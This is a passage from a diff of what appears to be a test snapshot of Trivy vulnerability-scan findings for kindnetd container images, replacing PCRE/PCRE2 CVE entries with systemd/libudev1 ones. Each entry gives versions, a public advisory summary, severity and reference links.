"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2LSDMHAKI4LGFOCSPXNVVSEWQFAVFWR7/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1586", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20221028-0009/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-33910", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5627-1", + "value": "https://security.gentoo.org/glsa/202107-48", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5627-2", + "value": "https://security.netapp.com/advisory/ntap-20211104-0008/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-1586", + "value": "https://ubuntu.com/security/notices/USN-5013-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5013-2", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-33910", + }, + { + "type": "URL", + "value": "https://www.debian.org/security/2021/dsa-4942", + }, + { + "type": "URL", + "value": "https://www.openwall.com/lists/oss-security/2021/07/20/2", + }, + { + "type": "URL", + "value": "https://www.qualys.com/2021/07/20/cve-2021-33910/denial-of-service-systemd.txt", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "10.36-2+deb11u1", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-1587", - "installedVersion": "10.36-2", - "packageName": "libpcre2-8-0", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-3997", + "installedVersion": "241-7~deb10u5", + "packageName": "libudev1", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-1587", - "https://bugzilla.redhat.com/show_bug.cgi?id=2077983,", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1587", - "https://github.com/PCRE2Project/pcre2/commit/03654e751e7f0700693526b67dfcadda6b42c9d0", - "https://linux.oracle.com/cve/CVE-2022-1587.html", - "https://linux.oracle.com/errata/ELSA-2022-5251.html", - "https://lists.debian.org/debian-lts-announce/2023/03/msg00014.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DWNG2NS3GINO6LQYUVC4BZLUQPJ3DYHA/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXINO3KKI5DICQ45E2FKD6MKVMGJLEKJ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KAX7767BCUFC7JMDGP7GOQ5GIZCAUGBB/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M2GLQQUEY5VFM57CFYXVIFOXN2HUZPDM/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-1587", - "https://security.netapp.com/advisory/ntap-20221028-0009/", - "https://ubuntu.com/security/notices/USN-5627-1", - "https://ubuntu.com/security/notices/USN-5627-2", - "https://www.cve.org/CVERecord?id=CVE-2022-1587", + "https://access.redhat.com/security/cve/CVE-2021-3997", + "https://bugzilla.redhat.com/show_bug.cgi?id=2024639", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3997", + "https://github.com/systemd/systemd/commit/5b1cf7a9be37e20133c0208005274ce4a5b5c6a1", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3997", + "https://security.gentoo.org/glsa/202305-15", + "https://ubuntu.com/security/notices/USN-5226-1", + "https://www.cve.org/CVERecord?id=CVE-2021-3997", + "https://www.openwall.com/lists/oss-security/2022/01/10/2", ], }, "category": "Vulnerability", - "description": "An out-of-bounds read vulnerability was discovered in the PCRE2 library in the get_recurse_data_length() function of the pcre2_jit_compile.c file. This issue affects recursions in JIT-compiled regular expressions caused by duplicate data transfers.", + "description": "A flaw was found in systemd. An uncontrolled recursion in systemd-tmpfiles may lead to a denial of service at boot time when too many nested directories are created in /tmp.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "pcre2: Out-of-bounds read in get_recurse_data_length in pcre2_jit_compile.c", + "name": "systemd: Uncontrolled recursion in systemd-tmpfiles when removing files", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-1587", + "value": "https://avd.aquasec.com/nvd/cve-2021-3997", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-1587", + "value": "https://access.redhat.com/security/cve/CVE-2021-3997", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2077983,", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2024639", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1587", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3997", }, { "type": "URL", - "value": "https://github.com/PCRE2Project/pcre2/commit/03654e751e7f0700693526b67dfcadda6b42c9d0", + "value": "https://github.com/systemd/systemd/commit/5b1cf7a9be37e20133c0208005274ce4a5b5c6a1", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-1587.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3997", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-5251.html", + "value": "https://security.gentoo.org/glsa/202305-15", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/03/msg00014.html", + "value": "https://ubuntu.com/security/notices/USN-5226-1", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DWNG2NS3GINO6LQYUVC4BZLUQPJ3DYHA/", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3997", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXINO3KKI5DICQ45E2FKD6MKVMGJLEKJ/", + "value": "https://www.openwall.com/lists/oss-security/2022/01/10/2", + }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-3821", + "installedVersion": "241-7~deb10u5", + "packageName": "libudev1", + "references": [ + "https://access.redhat.com/errata/RHSA-2023:0336", + "https://access.redhat.com/security/cve/CVE-2022-3821", + "https://bugzilla.redhat.com/2139327", + "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", + "https://errata.almalinux.org/9/ALSA-2023-0336.html", + "https://errata.rockylinux.org/RLSA-2023:0336", + "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", + "https://github.com/systemd/systemd/issues/23928", + "https://github.com/systemd/systemd/pull/23933", + "https://linux.oracle.com/cve/CVE-2022-3821.html", + "https://linux.oracle.com/errata/ELSA-2023-0336.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", + "https://security.gentoo.org/glsa/202305-15", + "https://ubuntu.com/security/notices/USN-5928-1", + "https://www.cve.org/CVERecord?id=CVE-2022-3821", + ], + }, + "category": "Vulnerability", + "description": "An off-by-one Error issue was discovered in Systemd in format_timespan() function of time-util.c. An attacker could supply specific values for time and accuracy that leads to buffer overrun in format_timespan(), leading to a Denial of Service.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "buffer overrun in format_timespan() function", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2022-3821", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KAX7767BCUFC7JMDGP7GOQ5GIZCAUGBB/", + "value": "https://access.redhat.com/errata/RHSA-2023:0336", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M2GLQQUEY5VFM57CFYXVIFOXN2HUZPDM/", + "value": "https://access.redhat.com/security/cve/CVE-2022-3821", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1587", + "value": "https://bugzilla.redhat.com/2139327", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20221028-0009/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5627-1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5627-2", + "value": "https://errata.almalinux.org/9/ALSA-2023-0336.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-1587", + "value": "https://errata.rockylinux.org/RLSA-2023:0336", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2017-11164", - "installedVersion": "2:8.39-13", - "packageName": "libpcre3", - "references": [ - "http://openwall.com/lists/oss-security/2017/07/11/3", - "http://www.openwall.com/lists/oss-security/2023/04/11/1", - "http://www.openwall.com/lists/oss-security/2023/04/12/1", - "http://www.securityfocus.com/bid/99575", - "https://access.redhat.com/security/cve/CVE-2017-11164", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11164", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2017-11164", - "https://www.cve.org/CVERecord?id=CVE-2017-11164", - ], - }, - "category": "Vulnerability", - "description": "In PCRE 8.41, the OP_KETRMAX feature in the match function in pcre_exec.c allows stack exhaustion (uncontrolled recursion) when processing a crafted regular expression.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "pcre: OP_KETRMAX feature in the match function in pcre_exec.c", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2017-11164", + "value": "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", }, { "type": "URL", - "value": "http://openwall.com/lists/oss-security/2017/07/11/3", + "value": "https://github.com/systemd/systemd/issues/23928", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/04/11/1", + "value": "https://github.com/systemd/systemd/pull/23933", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/04/12/1", + "value": "https://linux.oracle.com/cve/CVE-2022-3821.html", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/99575", + "value": "https://linux.oracle.com/errata/ELSA-2023-0336.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2017-11164", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11164", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://security.gentoo.org/glsa/202305-15", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-11164", + "value": "https://ubuntu.com/security/notices/USN-5928-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2017-11164", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-3821", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2017-16231", - "installedVersion": "2:8.39-13", - "packageName": "libpcre3", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-4415", + "installedVersion": "241-7~deb10u5", + "packageName": "libudev1", "references": [ - "http://packetstormsecurity.com/files/150897/PCRE-8.41-Buffer-Overflow.html", - "http://seclists.org/fulldisclosure/2018/Dec/33", - "http://www.openwall.com/lists/oss-security/2017/11/01/11", - "http://www.openwall.com/lists/oss-security/2017/11/01/3", - "http://www.openwall.com/lists/oss-security/2017/11/01/7", - "http://www.openwall.com/lists/oss-security/2017/11/01/8", - "http://www.securityfocus.com/bid/101688", - "https://access.redhat.com/security/cve/CVE-2017-16231", - "https://bugs.exim.org/show_bug.cgi?id=2047", - "https://nvd.nist.gov/vuln/detail/CVE-2017-16231", - "https://www.cve.org/CVERecord?id=CVE-2017-16231", + "https://access.redhat.com/errata/RHSA-2023:0954", + "https://access.redhat.com/security/cve/CVE-2022-4415", + "https://bugzilla.redhat.com/2149063", + "https://bugzilla.redhat.com/2155515", + "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", + "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", + "https://errata.almalinux.org/9/ALSA-2023-0954.html", + "https://errata.rockylinux.org/RLSA-2023:0954", + "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", + "https://linux.oracle.com/cve/CVE-2022-4415.html", + "https://linux.oracle.com/errata/ELSA-2023-0954.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", + "https://ubuntu.com/security/notices/USN-5928-1", + "https://www.cve.org/CVERecord?id=CVE-2022-4415", + "https://www.openwall.com/lists/oss-security/2022/12/21/3", ], }, "category": "Vulnerability", - "description": "** DISPUTED ** In PCRE 8.41, after compiling, a pcretest load test PoC produces a crash overflow in the function match() in pcre_exec.c because of a self-recursive call. NOTE: third parties dispute the relevance of this report, noting that there are options that can be used to limit the amount of stack that is used.", + "description": "A vulnerability was found in systemd. This security flaw can cause a local information leak due to systemd-coredump not respecting the fs.suid_dumpable kernel setting.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "pcre: self-recursive call in match() in pcre_exec.c leads to denial of service", + "name": "systemd: local information leak due to systemd-coredump not respecting fs.suid_dumpable kernel setting", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2017-16231", + "value": "https://avd.aquasec.com/nvd/cve-2022-4415", + }, + { + "type": "URL", + "value": "https://access.redhat.com/errata/RHSA-2023:0954", + }, + { + "type": "URL", + "value": "https://access.redhat.com/security/cve/CVE-2022-4415", }, { "type": "URL", - "value": "http://packetstormsecurity.com/files/150897/PCRE-8.41-Buffer-Overflow.html", + "value": "https://bugzilla.redhat.com/2149063", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2018/Dec/33", + "value": "https://bugzilla.redhat.com/2155515", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2017/11/01/11", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2017/11/01/3", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2017/11/01/7", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2017/11/01/8", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/101688", + "value": "https://errata.almalinux.org/9/ALSA-2023-0954.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2017-16231", + "value": "https://errata.rockylinux.org/RLSA-2023:0954", }, { "type": "URL", - "value": "https://bugs.exim.org/show_bug.cgi?id=2047", + "value": "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-16231", + "value": "https://linux.oracle.com/cve/CVE-2022-4415.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2017-16231", + "value": "https://linux.oracle.com/errata/ELSA-2023-0954.html", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5928-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-4415", + }, + { + "type": "URL", + "value": "https://www.openwall.com/lists/oss-security/2022/12/21/3", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2017-7245", - "installedVersion": "2:8.39-13", - "packageName": "libpcre3", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2013-4392", + "installedVersion": "241-7~deb10u5", + "packageName": "libudev1", "references": [ - "http://www.securityfocus.com/bid/97067", - "https://access.redhat.com/errata/RHSA-2018:2486", - "https://access.redhat.com/security/cve/CVE-2017-7245", - "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", - "https://nvd.nist.gov/vuln/detail/CVE-2017-7245", - "https://security.gentoo.org/glsa/201710-25", - "https://www.cve.org/CVERecord?id=CVE-2017-7245", + "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", + "http://www.openwall.com/lists/oss-security/2013/10/01/9", + "https://access.redhat.com/security/cve/CVE-2013-4392", + "https://bugzilla.redhat.com/show_bug.cgi?id=859060", + "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", + "https://www.cve.org/CVERecord?id=CVE-2013-4392", ], }, "category": "Vulnerability", - "description": "Stack-based buffer overflow in the pcre32_copy_substring function in pcre_get.c in libpcre1 in PCRE 8.40 allows remote attackers to cause a denial of service (WRITE of size 4) or possibly have unspecified other impact via a crafted file.", + "description": "systemd, when updating file permissions, allows local users to change the permissions and SELinux security contexts for arbitrary files via a symlink attack on unspecified files.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "pcre: stack-based buffer overflow write in pcre32_copy_substring", + "name": "TOCTOU race condition when updating file permissions and SELinux security contexts", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2017-7245", - }, - { - "type": "URL", - "value": "http://www.securityfocus.com/bid/97067", + "value": "https://avd.aquasec.com/nvd/cve-2013-4392", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2018:2486", + "value": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2017-7245", + "value": "http://www.openwall.com/lists/oss-security/2013/10/01/9", }, { "type": "URL", - "value": "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", + "value": "https://access.redhat.com/security/cve/CVE-2013-4392", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-7245", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=859060", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/201710-25", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2017-7245", + "value": "https://www.cve.org/CVERecord?id=CVE-2013-4392", }, ], "severity": "LOW", @@ -91467,57 +92281,82 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2017-7246", - "installedVersion": "2:8.39-13", - "packageName": "libpcre3", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-20386", + "installedVersion": "241-7~deb10u5", + "packageName": "libudev1", "references": [ - "http://www.securityfocus.com/bid/97067", - "https://access.redhat.com/errata/RHSA-2018:2486", - "https://access.redhat.com/security/cve/CVE-2017-7246", - "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", - "https://nvd.nist.gov/vuln/detail/CVE-2017-7246", - "https://security.gentoo.org/glsa/201710-25", - "https://www.cve.org/CVERecord?id=CVE-2017-7246", + "http://lists.opensuse.org/opensuse-security-announce/2020-02/msg00014.html", + "https://access.redhat.com/security/cve/CVE-2019-20386", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20386", + "https://github.com/systemd/systemd/commit/b2774a3ae692113e1f47a336a6c09bac9cfb49ad", + "https://linux.oracle.com/cve/CVE-2019-20386.html", + "https://linux.oracle.com/errata/ELSA-2020-4553.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HZPCOMW5X6IZZXASCDD2CNW2DLF3YADC/", + "https://nvd.nist.gov/vuln/detail/CVE-2019-20386", + "https://security.netapp.com/advisory/ntap-20200210-0002/", + "https://ubuntu.com/security/notices/USN-4269-1", + "https://usn.ubuntu.com/4269-1/", + "https://www.cve.org/CVERecord?id=CVE-2019-20386", ], }, "category": "Vulnerability", - "description": "Stack-based buffer overflow in the pcre32_copy_substring function in pcre_get.c in libpcre1 in PCRE 8.40 allows remote attackers to cause a denial of service (WRITE of size 268) or possibly have unspecified other impact via a crafted file.", + "description": "An issue was discovered in button_open in login/logind-button.c in systemd before 243. When executing the udevadm trigger command, a memory leak may occur.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "pcre: stack-based buffer overflow write in pcre32_copy_substring", + "name": "systemd: memory leak in button_open() in login/logind-button.c when udev events are received", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2017-7246", + "value": "https://avd.aquasec.com/nvd/cve-2019-20386", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/97067", + "value": "http://lists.opensuse.org/opensuse-security-announce/2020-02/msg00014.html", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2018:2486", + "value": "https://access.redhat.com/security/cve/CVE-2019-20386", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2017-7246", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20386", }, { "type": "URL", - "value": "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", + "value": "https://github.com/systemd/systemd/commit/b2774a3ae692113e1f47a336a6c09bac9cfb49ad", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-7246", + "value": "https://linux.oracle.com/cve/CVE-2019-20386.html", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/201710-25", + "value": "https://linux.oracle.com/errata/ELSA-2020-4553.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2017-7246", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HZPCOMW5X6IZZXASCDD2CNW2DLF3YADC/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-20386", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20200210-0002/", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-4269-1", + }, + { + "type": "URL", + "value": "https://usn.ubuntu.com/4269-1/", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-20386", }, ], "severity": "LOW", @@ -91525,117 +92364,135 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-20838", - "installedVersion": "2:8.39-13", - "packageName": "libpcre3", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-13529", + "installedVersion": "241-7~deb10u5", + "packageName": "libudev1", "references": [ - "http://seclists.org/fulldisclosure/2020/Dec/32", - "http://seclists.org/fulldisclosure/2021/Feb/14", - "https://access.redhat.com/security/cve/CVE-2019-20838", - "https://bugs.gentoo.org/717920", - "https://bugzilla.redhat.com/show_bug.cgi?id=1848436", - "https://bugzilla.redhat.com/show_bug.cgi?id=1848444", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20838", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14155", - "https://errata.almalinux.org/8/ALSA-2021-4373.html", - "https://errata.rockylinux.org/RLSA-2021:4373", - "https://linux.oracle.com/cve/CVE-2019-20838.html", - "https://linux.oracle.com/errata/ELSA-2021-4373.html", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2019-20838", - "https://support.apple.com/kb/HT211931", - "https://support.apple.com/kb/HT212147", - "https://ubuntu.com/security/notices/USN-5425-1", - "https://www.cve.org/CVERecord?id=CVE-2019-20838", - "https://www.pcre.org/original/changelog.txt", + "http://www.openwall.com/lists/oss-security/2021/08/04/2", + "http://www.openwall.com/lists/oss-security/2021/08/17/3", + "http://www.openwall.com/lists/oss-security/2021/09/07/3", + "https://access.redhat.com/security/cve/CVE-2020-13529", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", + "https://linux.oracle.com/cve/CVE-2020-13529.html", + "https://linux.oracle.com/errata/ELSA-2021-4361.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", + "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", + "https://security.gentoo.org/glsa/202107-48", + "https://security.netapp.com/advisory/ntap-20210625-0005/", + "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", + "https://ubuntu.com/security/notices/USN-5013-1", + "https://ubuntu.com/security/notices/USN-5013-2", + "https://www.cve.org/CVERecord?id=CVE-2020-13529", ], }, "category": "Vulnerability", - "description": "libpcre in PCRE before 8.43 allows a subject buffer over-read in JIT when UTF is disabled, and \\X or \\R has more than one fixed quantifier, a related issue to CVE-2019-20454.", + "description": "An exploitable denial-of-service vulnerability exists in Systemd 245. A specially crafted DHCP FORCERENEW packet can cause a server running the DHCP client to be vulnerable to a DHCP ACK spoofing attack. An attacker can forge a pair of FORCERENEW and DCHP ACK packets to reconfigure the server.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "pcre: Buffer over-read in JIT when UTF is disabled and \\X or \\R has fixed quantifier greater than 1", + "name": "systemd: DHCP FORCERENEW authentication not implemented can cause a system running the DHCP client to have its network reconfigured", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-20838", + "value": "https://avd.aquasec.com/nvd/cve-2020-13529", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2020/Dec/32", + "value": "http://www.openwall.com/lists/oss-security/2021/08/04/2", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2021/Feb/14", + "value": "http://www.openwall.com/lists/oss-security/2021/08/17/3", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-20838", + "value": "http://www.openwall.com/lists/oss-security/2021/09/07/3", }, { "type": "URL", - "value": "https://bugs.gentoo.org/717920", + "value": "https://access.redhat.com/security/cve/CVE-2020-13529", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1848436", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1848444", + "value": "https://linux.oracle.com/cve/CVE-2020-13529.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20838", + "value": "https://linux.oracle.com/errata/ELSA-2021-4361.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14155", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4373.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2021:4373", + "value": 